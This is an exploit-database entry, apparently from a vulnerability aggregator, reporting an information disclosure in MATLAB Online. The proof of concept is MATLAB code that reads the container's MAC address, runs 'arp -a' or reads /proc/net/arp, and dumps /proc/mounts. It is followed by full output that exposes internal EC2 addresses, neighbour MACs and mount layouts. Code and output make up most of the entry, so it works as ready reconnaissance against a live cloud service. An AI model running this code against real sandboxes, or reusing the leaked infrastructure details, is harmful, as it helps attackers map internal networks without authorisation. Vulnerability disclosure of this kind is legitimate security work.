📄 MATLAB R2024a Arbitrary Local System Information Disclosure

🗓️ 01 Jun 2026 00:00:00Reported by indoushkaType
MATLAB R2024a local system information disclosure via sandbox bypass reading MAC, ARP, and mount details.
==================================================================================================================================
    | # Title     : MATLAB R2024a Full Infrastructure Disclosure and Internal Network Mapping via Online Sandbox                     |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://matlab.mathworks.com/                                                                                    |
    ==================================================================================================================================
    
    [+] Summary    : successfully bypassed the sandbox using fileread to extract the host's MAC address and kernel mount details from /proc/mounts.
    
    [+] POC        : place the code below in the command prompt of the MATLAB
    
    try
        eth0_mac = fileread('/sys/class/net/eth0/address');
        fprintf('CRITICAL: eth0 MAC Address: %s', eth0_mac);
    catch
        disp('Could not read eth0 MAC.');
    end
    
    
    [status, arp_info] = system('arp -a');
    if status == 0
        disp('Internal Network Neighbors:');
        disp(arp_info);
    else
        disp('ARP command restricted, trying proc/net/arp...');
        try
            arp_proc = fileread('/proc/net/arp');
            disp(arp_proc);
        catch
            disp('ARP info is fully protected.');
        end
    end
    
    
    [status, mount_details] = system('cat /proc/mounts');
    disp('Mount Points Analysis:');
    disp(mount_details);
    
    [+] Rzlt :
    
    CRITICAL: eth0 MAC Address: 36:ab:51:23:de:f0
    
    Internal Network Neighbors:
    
    ip-10-168-145-28.ec2.internal (10.168.145.28) at 12:0e:10:78:54:72 [ether] on eth0
    
    ? (169.254.1.1) at 12:0e:10:78:54:72 [ether] PERM on eth0
    
    
    Mount Points Analysis:
    
    none / overlay ro,relatime,lowerdir=mnt:etc:/private/bundles/matlab/layer:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/ce13c7ea78933334c2e1bafc9e/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/3afba3aa964848d5d9fd73e385/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/74d0e1fcc28e73c6d1e9a5897c/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/5c9144a16da17f0cc8248d4025/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/2341c3a87f2dabed6c6aa19a00/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/62649978667e9eab27cf0c43d5/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/ac06d2cfa1a32e02a82738120f/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/d687193fa35a62c0d4e87f4851/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/f11bb60810ad7033c841775d67/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/b50fab0d3d288a6f7616b2e793/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/06d5f727f08cb4d3b92cdcd82f/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/4a09ce1ff1f00a289c0c3a60a1/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/e5d8f28f87d2ba2720f9825dd4/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/eb28f642e70c727c67f8d88a18/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/1fb507001f9f8b7a11adf33d83/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/d09af82c869438ebd387274aac/data:/shared/br2026ad-j3234472oll-matlab-pool-v2/oci/2f7571f14c6ff1d57c690bd192/data,upperdir=/private/bundles/matlab/rootfs.upper,workdir=/private/bundles/matlab/rootfs.work,uuid=on,xino=off,nouserxattr 0 0
    
    /dev/nvme1n1 /opt/mlsedu/matlab/SupportPackage ext4 ro,relatime,discard 0 0
    
    /dev/root /home/matlab ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/root /home/matlab/.MathWorks ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/root /home/matlab/.MATLABConnector ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/root /tmp ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/root /tmp/MathWorks-matlab ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/root /users ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/nvme1n1 /MATLAB ext4 ro,relatime,discard 0 0
    
    /dev/root /OneDrive ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/root /MATLAB\040Drive ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/root /.session_data ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/root /MATLAB\040Add-Ons ext4 rw,relatime,discard,errors=remount-ro 0 0
    
    /dev/nvme1n1 /SupportPackages ext4 ro,relatime,discard 0 0
    
    proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
    
    tmpfs /dev tmpfs rw,nosuid,size=100k,mode=755,inode64 0 0
    
    devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0
    
    shm /dev/shm tmpfs rw,nosuid,nodev,noexec,relatime,size=98304k,inode64 0 0
    
    mqueue /dev/mqueue mqueue rw,nosuid,nodev,noexec,relatime 0 0
    
    devpts /dev/console devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666 0 0
    
    sysfs /sys sysfs ro,nosuid,nodev,noexec,relatime 0 0
    
    overlay:gds://(session_data)/!/ /.session_data fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0
    
    overlay:gds://(matlab_drive)/!/ /MATLAB\040Drive fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0
    
    overlay:gds://(AddOns)/!/ /MATLAB\040Add-Ons fuse.mwfs rw,nosuid,nodev,relatime,user_id=1000600715,group_id=1000600912,default_permissions,allow_other 0 0
    
    /dev/root /users/mwa0000041333641 ext4 rw,relatime,discard,errors=remount-ro 0 0 
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
01 Jun 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9